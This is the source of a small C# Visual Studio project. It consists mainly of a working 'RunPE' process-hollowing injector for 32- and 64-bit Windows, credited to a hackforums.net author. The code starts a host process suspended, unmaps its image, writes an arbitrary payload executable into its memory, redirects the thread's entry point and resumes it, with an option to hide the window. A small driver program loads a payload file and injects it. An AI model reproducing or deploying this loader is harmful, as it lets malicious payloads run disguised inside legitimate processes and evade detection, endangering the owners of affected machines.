├── .gitignore
├── antis
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── antis.csproj
├── WinX64.cs
├── WinX86.cs
└── WinXComponents.cs
└── antis.sln
/.gitignore:
--------------------------------------------------------------------------------
1 | .vs/.
2 | .vs/
3 | .vs
4 |
5 | antis/bin/.
6 | antis/obj/.
7 |
8 | antis/bin/
9 | antis/obj/
10 |
11 | antis/bin
12 | antis/obj
--------------------------------------------------------------------------------
/antis/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/antis/Program.cs:
--------------------------------------------------------------------------------
1 | using HackForums.gigajew;
2 | using System;
3 | using System.IO;
4 | using System.Reflection;
5 | using System.Runtime.InteropServices;
6 | using System.Text;
7 |
8 | namespace antis
9 | {
10 | public static class Program
11 | {
12 |
13 | public static int Main(string[] args)
14 | {
15 | byte[] payload_amd64 = File.ReadAllBytes("putty64.exe");
16 | string calculator_amd64 = typeof(Program).Assembly.Location;
17 | string[] arguments = null;
18 | bool hidden = false;
19 |
20 | WinXParameters parameters = WinXParameters.Create(payload_amd64, calculator_amd64, hidden, arguments);
21 | WinXRunPE_AMD64.Start(parameters);
22 |
23 |
24 |
25 | return 0;
26 | }
27 |
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/antis.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.106
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "antis", "antis\antis.csproj", "{BA01D9F2-5DC6-4C37-A822-6BD864D3BF15}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {BA01D9F2-5DC6-4C37-A822-6BD864D3BF15}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {BA01D9F2-5DC6-4C37-A822-6BD864D3BF15}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {BA01D9F2-5DC6-4C37-A822-6BD864D3BF15}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {BA01D9F2-5DC6-4C37-A822-6BD864D3BF15}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {975FAFDF-C2DC-4D36-8BE5-7F61B3D1F3D8}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/antis/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("antis")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("antis")]
13 | [assembly: AssemblyCopyright("Copyright © 2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("ba01d9f2-5dc6-4c37-a822-6bd864d3bf15")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/antis/antis.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {BA01D9F2-5DC6-4C37-A822-6BD864D3BF15}
8 | Exe
9 | antis
10 | antis
11 | v4.6
12 | 512
13 | true
14 | true
15 |
16 |
17 |
18 | x64
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 | true
27 | false
28 |
29 |
30 | x64
31 | pdbonly
32 | true
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 | true
38 | true
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
--------------------------------------------------------------------------------
/antis/WinX64.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * WinXRunPE_AMD64.cs
3 | * Created by gigajew @ www.hackforums.net
4 | *
5 | * I put hours of work in to this, so please do leave these credits :)
6 | *
7 | *
8 | * P.s. If you cannot get this to work, make sure you hit Project Properties -> Build -> Allow unsafe code
9 | */
10 |
11 | using System;
12 | using System.ComponentModel;
13 | using System.IO;
14 | using System.Reflection;
15 | using System.Runtime.InteropServices;
16 | using static HackForums.gigajew.WinXComponents;
17 |
18 | namespace HackForums.gigajew
19 | {
20 | ///
21 | /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
22 | /// Please leave these credits as a reminder of all the hours of work put into this
23 | ///
24 | public static unsafe class WinXRunPE_AMD64
25 | {
26 | public static bool Start(WinXParameters parameters)
27 | {
28 | _IMAGE_DOS_HEADER* dosHeader;
29 | _IMAGE_NT_HEADERS64* ntHeaders;
30 |
31 | IntPtr pImageBase;
32 | IntPtr pBuffer;
33 |
34 | string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location);
35 |
36 | ProcessInfo processInfo;
37 | processInfo = new ProcessInfo();
38 |
39 | _CONTEXT_AMD64 context = new _CONTEXT_AMD64();
40 | context.ContextFlags = 0x10001b;
41 |
42 | // get the address of buffer
43 | fixed (byte* pBufferUnsafe = parameters.Payload)
44 | {
45 | pBuffer = (IntPtr)pBufferUnsafe;
46 | dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
47 | ntHeaders = (_IMAGE_NT_HEADERS64*)(pBufferUnsafe + (dosHeader->e_lfanew));
48 | }
49 |
50 | // security checks
51 | if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
52 | {
53 | throw new Win32Exception("Not a valid Win32 PE! -gigajew");
54 | }
55 |
56 | // check 32-bit
57 | if (ntHeaders->OptionalHeader.Magic != 0x20b)
58 | {
59 | throw new Exception("This RunPE only supports AMD64-built executables! -gigajew");
60 | }
61 |
62 | // init
63 | uint creationFlags = 0x00000004u | 0x00000008;
64 | if (parameters.Hidden)
65 | {
66 | creationFlags |= 0x08000000u;
67 | }
68 |
69 | if (!CreateProcessInternal(0u, null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, creationFlags, IntPtr.Zero, currentDir, new byte[0], &processInfo, 0u))
70 | {
71 | if (processInfo.hProcess != IntPtr.Zero)
72 | {
73 | if (!TerminateProcess(processInfo.hProcess, -1))
74 | {
75 | throw new Win32Exception(Marshal.GetLastWin32Error());
76 | }
77 | else
78 | {
79 | CloseHandle(processInfo.hProcess);
80 | CloseHandle(processInfo.hThread);
81 | }
82 | }
83 |
84 | return false;
85 | }
86 |
87 | // unmap
88 | pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
89 | NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
90 |
91 | // allocate
92 | if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
93 | {
94 | if (!TerminateProcess(processInfo.hProcess, -1))
95 | {
96 | throw new Win32Exception(Marshal.GetLastWin32Error());
97 | }
98 | else
99 | {
100 | CloseHandle(processInfo.hProcess);
101 | CloseHandle(processInfo.hThread);
102 |
103 | return false;
104 | }
105 | }
106 |
107 | // copy image headers
108 | if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
109 | {
110 | if (!TerminateProcess(processInfo.hProcess, -1))
111 | {
112 | throw new Win32Exception(Marshal.GetLastWin32Error());
113 | }
114 | else
115 | {
116 | CloseHandle(processInfo.hProcess);
117 | CloseHandle(processInfo.hThread);
118 |
119 | return false;
120 | }
121 | }
122 |
123 | // copy sections
124 | for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
125 | {
126 | _IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS64)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
127 |
128 | if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
129 | {
130 | if (!TerminateProcess(processInfo.hProcess, -1))
131 | {
132 | throw new Win32Exception(Marshal.GetLastWin32Error());
133 | }
134 | else
135 | {
136 | CloseHandle(processInfo.hProcess);
137 | CloseHandle(processInfo.hThread);
138 |
139 | return false;
140 | }
141 | }
142 | }
143 |
144 | // get thread context
145 |
146 | if (!GetThreadContext(processInfo.hThread, &context))
147 | {
148 | if (!TerminateProcess(processInfo.hProcess, -1))
149 | {
150 | throw new Win32Exception(Marshal.GetLastWin32Error());
151 | }
152 | else
153 | {
154 | CloseHandle(processInfo.hProcess);
155 | CloseHandle(processInfo.hThread);
156 |
157 | return false;
158 | }
159 | }
160 |
161 | // patch imagebase
162 | IntPtr address = Marshal.AllocHGlobal(8);
163 | ulong puImageBase = (ulong)pImageBase.ToInt64();
164 | byte[] pbImageBase = new byte[8];
165 | pbImageBase[0] = (byte)(puImageBase >> 0);
166 | pbImageBase[1] = (byte)(puImageBase >> 8);
167 | pbImageBase[2] = (byte)(puImageBase >> 16);
168 | pbImageBase[3] = (byte)(puImageBase >> 24);
169 | pbImageBase[4] = (byte)(puImageBase >> 32);
170 | pbImageBase[5] = (byte)(puImageBase >> 40);
171 | pbImageBase[6] = (byte)(puImageBase >> 48);
172 | pbImageBase[7] = (byte)(puImageBase >> 56);
173 | Marshal.Copy(pbImageBase, 0, address, 8);
174 | if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Rdx + 16ul), address, 8u, IntPtr.Zero))
175 | {
176 | Marshal.FreeHGlobal(address);
177 |
178 | if (!TerminateProcess(processInfo.hProcess, -1))
179 | {
180 | throw new Win32Exception(Marshal.GetLastWin32Error());
181 | }
182 | else
183 | {
184 | CloseHandle(processInfo.hProcess);
185 | CloseHandle(processInfo.hThread);
186 |
187 | return false;
188 | }
189 | }
190 |
191 | Marshal.FreeHGlobal(address);
192 |
193 | // patch ep
194 | context.Rcx = (ulong)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
195 |
196 | // set context
197 | if (!SetThreadContext(processInfo.hThread, &context))
198 | {
199 | if (!TerminateProcess(processInfo.hProcess, -1))
200 | {
201 | throw new Win32Exception(Marshal.GetLastWin32Error());
202 | }
203 | else
204 | {
205 | CloseHandle(processInfo.hProcess);
206 | CloseHandle(processInfo.hThread);
207 |
208 | return false;
209 | }
210 | }
211 |
212 | // resume thread
213 | ResumeThread(processInfo.hThread);
214 |
215 | // cleanup
216 | CloseHandle(processInfo.hProcess);
217 | CloseHandle(processInfo.hThread);
218 |
219 | return true;
220 | }
221 | }
222 | }
--------------------------------------------------------------------------------
/antis/WinX86.cs:
--------------------------------------------------------------------------------
1 | /*
2 | * WinXRunPE.cs
3 | * Created by gigajew @ www.hackforums.net
4 | *
5 | * I put hours of work in to this, so please do leave these credits :)
6 | *
7 | *
8 | * P.s. If you cannot get this to work, make sure you hit Project Properties -> Build -> Allow unsafe code
9 | */
10 |
11 | using System;
12 | using System.ComponentModel;
13 | using System.IO;
14 | using System.Reflection;
15 | using System.Runtime.InteropServices;
16 | using static HackForums.gigajew.WinXComponents;
17 |
18 | namespace HackForums.gigajew
19 | {
20 | ///
21 | /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10
22 | /// Please leave these credits as a reminder of all the hours of work put into this
23 | ///
24 | public static unsafe class WinX86
25 | {
26 | public static bool Start(WinXParameters parameters)
27 | {
28 | _IMAGE_DOS_HEADER* dosHeader;
29 | _IMAGE_NT_HEADERS* ntHeaders;
30 |
31 | IntPtr pImageBase;
32 | IntPtr pBuffer;
33 |
34 | bool emulatedi386 = false;
35 | string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location);
36 |
37 | ProcessInfo processInfo;
38 | processInfo = new ProcessInfo();
39 |
40 | _CONTEXT context = new _CONTEXT();
41 | context.ContextFlags = 0x10001b;
42 |
43 | // get the address of buffer
44 | fixed (byte* pBufferUnsafe = parameters.Payload)
45 | {
46 | pBuffer = (IntPtr)pBufferUnsafe;
47 | dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
48 | ntHeaders = (_IMAGE_NT_HEADERS*)(pBufferUnsafe + (dosHeader->e_lfanew));
49 | }
50 |
51 | // security checks
52 | if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
53 | {
54 | throw new Win32Exception("Not a valid Win32 PE! -gigajew");
55 | }
56 |
57 | // check 32-bit
58 | if (ntHeaders->OptionalHeader.Magic != 0x10b)
59 | {
60 | throw new Exception("This RunPE only supports i386-built executables! -gigajew");
61 | }
62 |
63 | // patch (by Menalix/gigajew)
64 | Buffer.SetByte(parameters.Payload, 0x398, 0x2);
65 |
66 | // init
67 | uint creationFlags = 0x00000004u | 0x00000008;
68 | if (parameters.Hidden)
69 | {
70 | creationFlags |= 0x08000000u;
71 | }
72 |
73 | if (!CreateProcessInternal(0u, null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, creationFlags, IntPtr.Zero, currentDir, new byte[0], &processInfo, 0u))
74 | {
75 | if (processInfo.hProcess != IntPtr.Zero)
76 | {
77 | if (!TerminateProcess(processInfo.hProcess, -1))
78 | {
79 | throw new Win32Exception(Marshal.GetLastWin32Error());
80 | }
81 | else
82 | {
83 | CloseHandle(processInfo.hProcess);
84 | CloseHandle(processInfo.hThread);
85 | }
86 | }
87 |
88 | return false;
89 | }
90 |
91 | // check emulated i386
92 | IsWow64Process(processInfo.hProcess, ref emulatedi386);
93 |
94 | // unmap
95 | pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
96 | NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
97 |
98 | // allocate
99 | if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
100 | {
101 | if (!TerminateProcess(processInfo.hProcess, -1))
102 | {
103 | throw new Win32Exception(Marshal.GetLastWin32Error());
104 | }
105 | else
106 | {
107 | CloseHandle(processInfo.hProcess);
108 | CloseHandle(processInfo.hThread);
109 |
110 | return false;
111 | }
112 | }
113 |
114 | // copy image headers
115 | if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
116 | {
117 | if (!TerminateProcess(processInfo.hProcess, -1))
118 | {
119 | throw new Win32Exception(Marshal.GetLastWin32Error());
120 | }
121 | else
122 | {
123 | CloseHandle(processInfo.hProcess);
124 | CloseHandle(processInfo.hThread);
125 |
126 | return false;
127 | }
128 | }
129 |
130 | // copy sections
131 | for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
132 | {
133 | _IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
134 |
135 | if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
136 | {
137 | if (!TerminateProcess(processInfo.hProcess, -1))
138 | {
139 | throw new Win32Exception(Marshal.GetLastWin32Error());
140 | }
141 | else
142 | {
143 | CloseHandle(processInfo.hProcess);
144 | CloseHandle(processInfo.hThread);
145 |
146 | return false;
147 | }
148 | }
149 | }
150 |
151 | // get thread context
152 | if (emulatedi386)
153 | {
154 | if (!Wow64GetThreadContext(processInfo.hThread, &context))
155 | {
156 | if (!TerminateProcess(processInfo.hProcess, -1))
157 | {
158 | throw new Win32Exception(Marshal.GetLastWin32Error());
159 | }
160 | else
161 | {
162 | CloseHandle(processInfo.hProcess);
163 | CloseHandle(processInfo.hThread);
164 |
165 | return false;
166 | }
167 | }
168 | }
169 | else
170 | {
171 | if (!GetThreadContext(processInfo.hThread, &context))
172 | {
173 | if (!TerminateProcess(processInfo.hProcess, -1))
174 | {
175 | throw new Win32Exception(Marshal.GetLastWin32Error());
176 | }
177 | else
178 | {
179 | CloseHandle(processInfo.hProcess);
180 | CloseHandle(processInfo.hThread);
181 |
182 | return false;
183 | }
184 | }
185 | }
186 |
187 | // patch imagebase
188 | IntPtr address = Marshal.AllocHGlobal(8);
189 | ulong puImageBase = (ulong)pImageBase.ToInt64();
190 | byte[] pbImageBase = new byte[8];
191 | pbImageBase[0] = (byte)(puImageBase >> 0);
192 | pbImageBase[1] = (byte)(puImageBase >> 8);
193 | pbImageBase[2] = (byte)(puImageBase >> 16);
194 | pbImageBase[3] = (byte)(puImageBase >> 24);
195 | pbImageBase[4] = (byte)(puImageBase >> 32);
196 | pbImageBase[5] = (byte)(puImageBase >> 40);
197 | pbImageBase[6] = (byte)(puImageBase >> 48);
198 | pbImageBase[7] = (byte)(puImageBase >> 56);
199 |
200 | Marshal.Copy(pbImageBase, 0, address, 8);
201 | if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Ebx + 8ul), address, 4u, IntPtr.Zero))
202 | {
203 | Marshal.FreeHGlobal(address);
204 |
205 | if (!TerminateProcess(processInfo.hProcess, -1))
206 | {
207 | throw new Win32Exception(Marshal.GetLastWin32Error());
208 | }
209 | else
210 | {
211 | CloseHandle(processInfo.hProcess);
212 | CloseHandle(processInfo.hThread);
213 |
214 | return false;
215 | }
216 | }
217 |
218 | Marshal.FreeHGlobal(address);
219 |
220 | // patch ep
221 | context.Eax = (uint)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
222 |
223 | // set context
224 | if (emulatedi386)
225 | {
226 | if (!Wow64SetThreadContext(processInfo.hThread, &context))
227 | {
228 | if (!TerminateProcess(processInfo.hProcess, -1))
229 | {
230 | throw new Win32Exception(Marshal.GetLastWin32Error());
231 | }
232 | else
233 | {
234 | CloseHandle(processInfo.hProcess);
235 | CloseHandle(processInfo.hThread);
236 |
237 | return false;
238 | }
239 | }
240 | }
241 | else
242 | {
243 | if (!SetThreadContext(processInfo.hThread, &context))
244 | {
245 | if (!TerminateProcess(processInfo.hProcess, -1))
246 | {
247 | throw new Win32Exception(Marshal.GetLastWin32Error());
248 | }
249 | else
250 | {
251 | CloseHandle(processInfo.hProcess);
252 | CloseHandle(processInfo.hThread);
253 |
254 | return false;
255 | }
256 | }
257 | }
258 |
259 | // resume thread
260 | ResumeThread(processInfo.hThread);
261 |
262 | // cleanup
263 | CloseHandle(processInfo.hProcess);
264 | CloseHandle(processInfo.hThread);
265 |
266 | return true;
267 | }
268 | }
269 | }
--------------------------------------------------------------------------------
/antis/WinXComponents.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace HackForums.gigajew
5 | {
6 | public unsafe class WinXComponents {
7 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
8 | [return: MarshalAs(UnmanagedType.Bool)]
9 | public static extern bool CreateProcessInternal([MarshalAs(UnmanagedType.U4)]uint hToken,
10 | [MarshalAs(UnmanagedType.LPTStr)]string lpApplicationName,
11 | [MarshalAs(UnmanagedType.LPTStr)]string lpCommandLine,
12 | [MarshalAs(UnmanagedType.SysInt)]IntPtr lpProcessAttributes,
13 | [MarshalAs(UnmanagedType.SysInt)]IntPtr lpThreadAttributes,
14 | [MarshalAs(UnmanagedType.Bool)]bool bInheritHandles,
15 | [MarshalAs(UnmanagedType.U4)]uint dwCreationFlags,
16 | [MarshalAs(UnmanagedType.SysInt)]IntPtr lpEnvironment,
17 | [MarshalAs(UnmanagedType.LPTStr)]string lpCurrentDirectory,
18 | byte[] lpStartupInfo,
19 | ProcessInfo* lpProcessInfo,
20 | [MarshalAs(UnmanagedType.U4)]uint hNewToken);
21 |
22 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
23 | [return: MarshalAs(UnmanagedType.Bool)]
24 | public static extern bool TerminateProcess([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.I4)]int exitCode);
25 |
26 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
27 | [return: MarshalAs(UnmanagedType.Bool)]
28 | public static extern bool CloseHandle([MarshalAs(UnmanagedType.SysInt)]IntPtr hObject);
29 |
30 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
31 | [return: MarshalAs(UnmanagedType.Bool)]
32 | public static extern bool Wow64GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
33 |
34 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
35 | [return: MarshalAs(UnmanagedType.Bool)]
36 | public static extern bool Wow64SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
37 |
38 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
39 | [return: MarshalAs(UnmanagedType.Bool)]
40 | public static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
41 |
42 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
43 | [return: MarshalAs(UnmanagedType.Bool)]
44 | public static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
45 |
46 | [DllImport("ntdll.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
47 | [return: MarshalAs(UnmanagedType.U4)]
48 | public static extern uint NtUnmapViewOfSection([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress);
49 |
50 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
51 | [return: MarshalAs(UnmanagedType.SysInt)]
52 | public static extern IntPtr VirtualAllocEx([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
53 | [MarshalAs(UnmanagedType.SysInt)]IntPtr lpAddress,
54 | [MarshalAs(UnmanagedType.U4)]uint dwSize,
55 | [MarshalAs(UnmanagedType.U4)]uint flAllocationType,
56 | [MarshalAs(UnmanagedType.U4)]uint flProtect);
57 |
58 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
59 | [return: MarshalAs(UnmanagedType.Bool)]
60 | public static extern bool WriteProcessMemory([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
61 | [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress,
62 | [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBuffer,
63 | [MarshalAs(UnmanagedType.U4)]uint nSize,
64 | [MarshalAs(UnmanagedType.SysInt)]IntPtr lpNumberOfBytesWritten);
65 |
66 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
67 | [return: MarshalAs(UnmanagedType.U4)]
68 | public static extern uint ResumeThread([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread);
69 |
70 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
71 | [return: MarshalAs(UnmanagedType.Bool)]
72 | public static extern bool IsWow64Process([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)]ref bool isWow64);
73 |
74 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
75 | [return: MarshalAs(UnmanagedType.Bool)]
76 | public static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
77 |
78 | [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
79 | [return: MarshalAs(UnmanagedType.Bool)]
80 | public static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
81 | }
82 |
83 | ///
84 | /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
85 | /// Please leave these credits as a reminder of all the hours of work put into this
86 | ///
87 | public class WinXParameters
88 | {
89 | public byte[] Payload
90 | {
91 | get { return _payload; }
92 | protected set { _payload = value; }
93 | }
94 |
95 | public string TargetProcess
96 | {
97 | get { return _targetProcess; }
98 | protected set { _targetProcess = value; }
99 | }
100 |
101 | public string[] Arguments
102 | {
103 | get { return _arguments; }
104 | protected set { _arguments = value; }
105 | }
106 |
107 | public bool Hidden
108 | {
109 | get { return _hidden; }
110 | protected set { _hidden = value; }
111 | }
112 |
113 | private WinXParameters() : base()
114 | {
115 | }
116 |
117 | ///
118 | /// Create parameters for the WinX Injector
119 | ///
120 | /// Your payload buffer
121 | /// The absolute or relative path of your target process (the host)
122 | /// Start the process hidden
123 | /// Optional arguments to pass to the payload
124 | /// The parameter object
125 | public static WinXParameters Create(byte[] payload, string targetProcess, bool hidden, params string[] arguments)
126 | {
127 | WinXParameters parameters = new WinXParameters();
128 | parameters.TargetProcess = targetProcess;
129 | parameters.Payload = payload;
130 | parameters.Arguments = arguments;
131 | parameters.Hidden = hidden;
132 | return parameters;
133 | }
134 |
135 | public string GetFormattedHostFileName()
136 | {
137 | if (Arguments != null)
138 | {
139 | if (Arguments.Length > 0)
140 | {
141 | return string.Format("{0} {1}", TargetProcess, string.Join(" ", Arguments));
142 | }
143 | }
144 |
145 | return TargetProcess;
146 | }
147 |
148 | private byte[] _payload;
149 | private string _targetProcess;
150 | private string[] _arguments;
151 | private bool _hidden;
152 | }
153 |
154 | #region "Shared"
155 | [StructLayout(LayoutKind.Sequential)]
156 | public struct ProcessInfo
157 | {
158 | public IntPtr hProcess;
159 | public IntPtr hThread;
160 | }
161 |
162 | [StructLayout(LayoutKind.Explicit, Size = 0x28)]
163 | public struct _IMAGE_SECTION_HEADER
164 | {
165 | [FieldOffset(0xc)]
166 | public UInt32 VirtualAddress;
167 |
168 | [FieldOffset(0x10)]
169 | public UInt32 SizeOfRawData;
170 |
171 | [FieldOffset(0x14)]
172 | public UInt32 PointerToRawData;
173 | }
174 |
175 | [StructLayout(LayoutKind.Explicit, Size = 0x14)]
176 | public struct _IMAGE_FILE_HEADER
177 | {
178 | [FieldOffset(0x02)]
179 | public ushort NumberOfSections;
180 | }
181 |
182 | [StructLayout(LayoutKind.Explicit, Size = 0x40)]
183 | public struct _IMAGE_DOS_HEADER
184 | {
185 | [FieldOffset(0x00)]
186 | public ushort e_magic;
187 |
188 | [FieldOffset(0x3c)]
189 | public uint e_lfanew;
190 | }
191 | #endregion
192 |
193 | #region "AMD64"
194 | [StructLayout(LayoutKind.Explicit, Size = 0x108)]
195 | public struct _IMAGE_NT_HEADERS64
196 | {
197 | [FieldOffset(0x00)]
198 | public uint Signature;
199 |
200 | [FieldOffset(0x04)]
201 | public _IMAGE_FILE_HEADER FileHeader;
202 |
203 | [FieldOffset(0x18)]
204 | public _IMAGE_OPTIONAL_HEADER64 OptionalHeader;
205 | }
206 |
207 | [StructLayout(LayoutKind.Explicit, Size = 0xf0)]
208 | public struct _IMAGE_OPTIONAL_HEADER64
209 | {
210 | [FieldOffset(0x00)]
211 | public ushort Magic;
212 |
213 | [FieldOffset(0x010)]
214 | public uint AddressOfEntryPoint;
215 |
216 | [FieldOffset(0x18)]
217 | public ulong ImageBase;
218 |
219 | [FieldOffset(0x38)]
220 | public uint SizeOfImage;
221 |
222 | [FieldOffset(0x3c)]
223 | public uint SizeOfHeaders;
224 | }
225 |
